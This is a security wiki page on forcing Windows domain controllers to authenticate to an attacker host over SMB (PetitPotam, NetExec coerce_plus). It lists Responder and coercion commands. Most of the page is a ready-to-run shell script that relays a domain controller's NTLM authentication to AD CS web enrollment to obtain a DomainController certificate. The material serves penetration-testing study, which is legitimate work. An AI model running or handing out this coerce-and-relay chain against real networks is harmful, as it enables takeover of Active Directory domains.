DWSec Wiki
SMB Coercing (445)

Last updated 5 months ago

Basics

SMB coercion forces a target Windows host, typically a domain controller, to authenticate to an attacker-controlled host over SMB. What arrives is an NTLM challenge-response (Net-NTLMv2) from the target's machine account. Machine-account passwords are long and random, so capturing that response for offline cracking is rarely worthwhile; the practical use of coercion is to relay the authentication (for example to an AD CS web-enrollment endpoint or to LDAP). There are several ways to trigger it. The best-known method abuses the Encrypting File System Remote Protocol (MS-EFSR) via the PetitPotam script; others abuse MS-RPRN (PrinterBug), MS-DFSNM (DFSCoerce) and MS-FSRVP (ShadowCoerce), and NetExec's coerce_plus module bundles several of these. Impacket's ntlmrelayx.py is not a coercion tool but the relay server that receives and forwards the coerced authentication. The other vectors will be added to this wiki in later versions.

Coercion can be thought of as the next step up from NTLM relaying: a relay needs a victim to authenticate to you, while coercion makes the victim do so on demand. See the NTLMRelaying (445) page.

Attacks

PetitPotam

Preparation:

Start a listener on the interface facing the target before triggering the coercion. Responder captures the Net-NTLMv2 response:

sudo responder -I <INTERFACE>

If the goal is to relay the authentication rather than capture it, start impacket's ntlmrelayx.py instead. Both tools bind port 445, so they cannot run at the same time; when Responder's poisoning is wanted alongside a relay, disable its SMB server in Responder.conf first.

Coercing execution:

PetitPotam.py

python3 PetitPotam.py -d <DOMAIN> -u <USER> -p <PASSWORD> <LISTENER_IP> <TARGET_IP>

The listener and target are positional; the domain and credentials are options. Omitting -d/-u/-p attempts the unauthenticated path, which Microsoft closed in August 2021 (CVE-2021-36942); against a patched host you need valid domain credentials.

NetExec

nxc smb <TARGET_IP> -u '' -p '' -M coerce_plus
nxc smb <TARGET_IP> -u '' -p '' -M coerce_plus -o LISTENER=<ATTACKER_IP>

Without LISTENER the module only reports which coercion methods the target appears vulnerable to; with LISTENER set it fires the coercion at the attacker IP. Replace the empty credentials with -u <USER> -p <PASSWORD> when the target refuses null sessions.
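The two steps above (listener first, then coerce) as one wrapper script. This is an added example for this page, not code from DWSec, PetitPotam or NetExec: the ntlmrelayx.py and nxc flags are the real ones, but the helper names, the preflight checks and the ESC8-style relay target (the default AD CS web-enrollment path on a hypothetical CA host) are assumptions for illustration.

```shell
#!/bin/sh
# Added example, not part of the DWSec wiki or of the tools it references.
# Wraps "start relay, then coerce" with the checks that most often explain a
# coercion that 'worked' but was never caught: a mistyped IP, or port 445
# still held by Responder so ntlmrelayx.py could not bind its SMB server.
set -u

# Reject anything that is not a dotted quad so a typo does not coerce
# (or relay to) the wrong host.
valid_ipv4() {
    case "$1" in
        ''|*[!0-9.]*) return 1 ;;
    esac
    oldifs=$IFS
    IFS=.
    set -- $1
    IFS=$oldifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ -n "$octet" ] || return 1        # catches "10..0.5" and ".1.2.3"
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Succeeds when nothing listens on TCP port $1. ntlmrelayx.py needs 445 and
# Responder binds it as well, so the two cannot run together.
port_free() {
    if command -v ss >/dev/null 2>&1; then
        listeners=$(ss -ltn 2>/dev/null | awk 'NR>1 {print $4}')
    else
        listeners=$(netstat -ltn 2>/dev/null | awk '{print $4}')
    fi
    ! printf '%s\n' "$listeners" | grep -qE ":$1\$"
}

# Relay listener: forward the coerced DC authentication to AD CS web
# enrollment and request a DomainController certificate (ESC8).
# $1 = CA host IP (hypothetical target in this example).
relay_cmd() {
    printf 'ntlmrelayx.py -t http://%s/certsrv/certfnsh.asp -smb2support --adcs --template DomainController' "$1"
}

# Coercion trigger via NetExec's coerce_plus module.
# $1 = target, $2 = listener (attacker) IP, $3/$4 = optional user/password.
# Empty credentials attempt a null session; hosts patched against
# unauthenticated PetitPotam need a real domain user.
coerce_cmd() {
    target=$1 listener=$2 user=${3:-} pass=${4:-}
    printf "nxc smb %s -u '%s' -p '%s' -M coerce_plus -o LISTENER=%s" \
        "$target" "$user" "$pass" "$listener"
}

# Usage: COERCE_RUN=1 sh coerce.sh <TARGET_IP> <CA_IP> <LISTENER_IP> [USER] [PASS]
# Nothing runs unless COERCE_RUN=1, so the file is safe to source for its helpers.
main() {
    target=$1 ca=$2 listener=$3
    for ip in "$target" "$ca" "$listener"; do
        valid_ipv4 "$ip" || { echo "bad IPv4 address: $ip" >&2; return 2; }
    done
    port_free 445 || { echo "port 445 busy (Responder still running?)" >&2; return 3; }
    echo "[*] relay:  $(relay_cmd "$ca")"
    sh -c "$(relay_cmd "$ca")" &
    relay_pid=$!
    sleep 3   # let the relay's SMB server bind before the DC connects back
    echo "[*] coerce: $(coerce_cmd "$target" "$listener" "${4:-}" "${5:-}")"
    sh -c "$(coerce_cmd "$target" "$listener" "${4:-}" "${5:-}")"
    wait "$relay_pid"
}

if [ "${COERCE_RUN:-0}" = 1 ]; then
    main "$@"
fi
```

The relay is started in the background and given a moment to bind before the coercion fires; if nxc reports the coercion as successful but ntlmrelayx.py shows no incoming connection, the usual causes are the listener IP not being reachable from the DC or port 445 having been taken by another tool, which is what the two preflight checks are for.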
